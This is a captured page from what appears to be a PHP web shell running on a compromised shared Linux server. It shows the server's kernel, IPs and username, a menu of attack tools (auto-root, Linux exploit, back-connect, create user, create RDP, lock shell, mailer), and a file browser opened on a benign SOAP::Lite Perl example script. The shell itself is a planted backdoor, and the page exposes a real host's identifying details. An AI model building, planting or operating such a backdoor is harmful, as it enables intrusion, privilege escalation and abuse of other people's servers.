Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsoap-lite-perl /
examples /
server /
[ HOME SHELL ]
Name
Size
Permission
Action
Apache.pm
768
B
-rw-r--r--
mod_soap.htaccess
972
B
-rw-r--r--
soap.asp
477
B
-rw-r--r--
soap.cgi
391
B
-rw-r--r--
soap.daemon
1.11
KB
-rw-r--r--
soap.daemon.forkafterprocessin...
1.06
KB
-rw-r--r--
soap.daemon.forkonaccept
985
B
-rw-r--r--
soap.fcgi
386
B
-rw-r--r--
soap.io
1.07
KB
-rw-r--r--
soap.jabber
573
B
-rw-r--r--
soap.mod_cgi
740
B
-rw-r--r--
soap.mq
631
B
-rw-r--r--
soap.pop3
1.02
KB
-rw-r--r--
soap.tcp
664
B
-rw-r--r--
soap.vbs
525
B
-rw-r--r--
soap_perl.asp
481
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : soap.daemon
#!/usr/bin/perl -w #!d:\perl\bin\perl.exe # -- SOAP::Lite -- soaplite.com -- Copyright (C) 2001 Paul Kulchenko -- use SOAP::Transport::HTTP; $SIG{PIPE} = $SIG{INT} = 'IGNORE'; # don't want to die on 'Broken pipe' or Ctrl-C # change LocalPort to 81 if you want to test it with soapmark.pl my $daemon = SOAP::Transport::HTTP::Daemon # if you do not specify LocalAddr then you can access it with # any hostname/IP alias, including localhost or 127.0.0.1. # if do you specify LocalAddr in ->new() then you can only access it # from that interface. -- Michael Percy <mpercy@portera.com> -> new (LocalAddr => 'localhost', LocalPort => 80) # you may also add other options, like 'Reuse' => 1 and/or 'Listen' => 128 # specify list of objects-by-reference here -> objects_by_reference(qw(My::PersistentIterator My::SessionIterator My::Chat)) # specify path to My/Examples.pm here -> dispatch_to('/Your/Path/To/Deployed/Modules', 'Module::Name', 'Module::method') # enable compression support -> options({compress_threshold => 10000}) ; print "Contact to SOAP server at ", $daemon->url, "\n"; $daemon->handle;
Close